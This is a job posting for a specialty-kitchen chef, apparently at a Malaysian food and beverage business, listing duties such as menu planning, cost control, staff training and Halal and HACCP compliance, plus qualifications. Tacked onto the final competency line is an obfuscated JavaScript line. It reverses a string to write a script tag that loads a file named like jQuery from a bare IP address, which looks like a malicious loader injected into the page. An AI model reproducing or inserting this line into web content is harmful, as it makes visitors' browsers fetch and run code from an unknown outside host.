Industry : F&B
Report To : Head of Kitchen Operations (Executive Chef)
Lead, manage and control the specialty kitchen operations in terms of cooking, maintaining food standards and quality, establishing menus and managing a team of cooks / kitchen assistants in an effective and efficient manner to support the overall business goals and objectives.
• Develop standard operating procedures (SOP) for the specialty kitchen in collaboration with the Head of Kitchen Operations (Executive Chef) to ensure the kitchen operations is carried out correctly and in a consistent manner.
• Produce and cook high quality dishes as per the designed menu for the specialty kitchen and continuously level up and improve to meet customer’s requirements.
• Plan work schedule and task for each member of the team and monitor its execution to ensure the kitchen is able to prepare and deliver consistent and quality food as per the timeline.
• Provide relevant trainings and supervision to junior chefs and cooks on food preparation and presentation to ensure high quality and food safety standards are met.
• Monitor and manage food and product ordering request by keeping detailed records and minimizes wastes through proper waste management system and cost saving initiatives.
• Propose enhancement to policy and procedures based on the changes observed in the market that may impact the operational excellence of the kitchen operations.
• Plan and work together with the team to ensure budget requirements are met and managed well to avoid unnecessary high expenses for the kitchen.
• Identify and realize all cost-saving and cost-reduction opportunities where possible to meet the organization’s objectives.
• Work with the Head of Kitchen Operations (Executive Chef) to produce diversified menus in accordance with the organization’s policy and vision.
• Propose new dishes and menu selections based on customer demand and seasonal ingredients to cater to customer satisfactions and eventually increase business sales.
• Ensure all products and ingredients used in food preparation are HALAL and at highest level of quality and consistent to meet customer expectations
• Ensure cleanliness and maintenance of work areas as per organization’s standard of hygiene procedures at all times.
• Oversee the safety regulations of the speciality kitchen operation areas ensuring proper handling of kitchen equipment and safe working practices with minimal incidents recorded.
• To ensure that the kitchen comply with the MeSTI, Halal, JAKIM and HACCP compliance procedures.
• Minimum Diploma in Culinary or any relevant qualifications
• Minimum of 10 years of relevant experience in kitchen operations in F&B/Retail/Hospitality sector
• Minimum 3 years of experience in a specialty cuisine
• Communication / Networking
• Detailed Oriented
• Leadership / People Management
• Customer focus
• Passion for Excellence
• Financial Acumen document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))